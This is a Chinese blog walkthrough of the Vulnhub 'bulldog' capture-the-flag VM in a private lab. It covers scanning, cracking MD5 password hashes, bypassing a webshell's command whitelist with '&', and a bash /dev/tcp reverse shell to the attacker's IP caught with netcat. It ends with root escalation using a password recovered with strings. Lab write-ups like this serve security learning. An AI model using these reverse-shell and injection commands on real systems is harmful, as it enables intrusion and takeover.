Vulnhub----bulldog靶场笔记
前提条件
kali和bulldog靶机的的ip地址在同一个网段
本测试环境:
kali:192.168.56.102
bulldog:192.168.56.101
主机探测
利用kali的netdiscover工具扫描靶机ip地址

kali和bulldog靶机的的ip地址在同一个网段
本测试环境:
kali:192.168.56.102
bulldog:192.168.56.101
扫描靶机端口
利用kali的nmap工具扫描靶机ip地址
nmap -p- 192.168.56.101

扫描目标靶机端口的详细服务信息
nmap -p23,80,8080 -A -T4 192.168.56.101

web服务是python2
用浏览器访问192.168.56.101并未发现异常;接下来扫描网站

发现了 /dev /admin robots.txt
/admin 是一个登录页面,SQL注入并未成功

/robots.txt 并未发现异常

访问/dev,发现了webshell连接,但是显示需要验证身份,可能需要先登录才能有权限使用此webshell

在注释中发现了异常

MD5值加密,使用在线解密网站解密试试。
成功解密两个账号密码:
- nick---bulldog
- sarah---bulldoglover
使用其中一个用户登录成功,然后使用/dev/中的webshell

白名单限制了使用的命令,通过&绕过

- 现在可以使用
echo 'bash -i >& /dev/tcp/192.168.56.102/6666 0>&1'|bash反弹shell到kali上 - kali上用nc侦听6666端口
nc -nvlp 6666

kali机成功获得反弹的shell
提权
使用普通用户的权限并没有发现要获得的信息,于是要提升root权限
在/home目录下发现bulldogadmin文件夹,看文件名觉得里面应该有东西

发现了隐藏文件夹,进去看看里面的东西

使用cat命令没有发现异常,使用strings发现下面了信息,去掉应该H是root密码---> SUPERultimatePASSWORDyouCANTget

在获得的shell界面直接切换root用户报错

于是使用python脚本
python -c 'import pty; pty.spawn("/bin/bash")'

输入刚才获取的密码即可

成功获取flag
后续技能学习:
- 反弹shell脚本,不仅仅限于bash方法
python -c 'import pty; pty.spawn("/bin/bash")'此类常用的shell代码
本文来自博客园,作者:oldliutou,转载请注明原文链接:https://www.cnblogs.com/oldliutou/p/15136064.html

浙公网安备 33010602011771号